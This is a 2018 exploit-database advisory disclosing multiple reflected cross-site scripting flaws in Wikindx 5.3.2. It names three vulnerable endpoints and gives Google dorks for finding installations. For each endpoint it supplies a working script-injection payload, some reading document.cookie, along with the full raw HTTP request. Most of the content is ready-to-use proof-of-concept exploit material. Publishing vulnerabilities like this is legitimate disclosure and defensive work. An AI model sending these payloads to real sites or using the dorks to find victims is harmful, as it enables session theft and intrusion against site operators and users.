Wikindx 5.3.2 Multiple Cross-Site Scripting

2018.10.03
tr Seccops (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: -
CWE: CWE-79

# Exploit Title: Wikindx 5.3.2 Multiple Cross-Site Scripting # Date: 01.10.2018 # Dork: inurl:/wikindx/ , inurl:index.php?action=noMenu&method= # Exploit Author: Seccops (https://seccops.com) # Vendor Homepage: http://wikindx.sourceforge.net/ # Software Link: https://sourceforge.net/projects/wikindx/files/latest/download # Version: 5.3.2 # Tested on: Windows 10 # Vulernability Type : Cross-site Scripting # CVE: - Vulnerability: http://localhost/we/wikindx/index.php Payload: '"--></style></scRipt><scRipt>alert(document.cookie)</templates/default/icons/help.png HTTP Request: GET /we/wikindx_5.3.2/wikindx/index.php/'"--></style></scRipt><scRipt>alert(document.cookie)</scRipt> HTTP/1.1 Host: localhost Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close --------------------- Vulnerability: http://localhost/we/wikindx_5.3.2/wikindx/index.php?action=noMenu&method= Payload: "><iMg src=i onerror=alert(document.cookie)> HTTP Request: GET /we/wikindx_5.3.2/wikindx/index.php?action=noMenu&method="><iMg src=i onerror=alert(document.cookie)> HTTP/1.1 Host: localhost Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close ------------------------ Vulnerability: http://localhost/we/wikindx_5.3.2/wikindx/core/tiny_mce/plugins/wikindxCite/dialog.php/ Payload: '"--></style></scRipt><scRipt>alert(1)</scRipt> HTTP Request: GET /we/wikindx_5.3.2/wikindx/core/tiny_mce/plugins/wikindxCite/dialog.php/'"--></style></scRipt><scRipt>alert(1)</scRipt> HTTP/1.1 Host: localhost Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top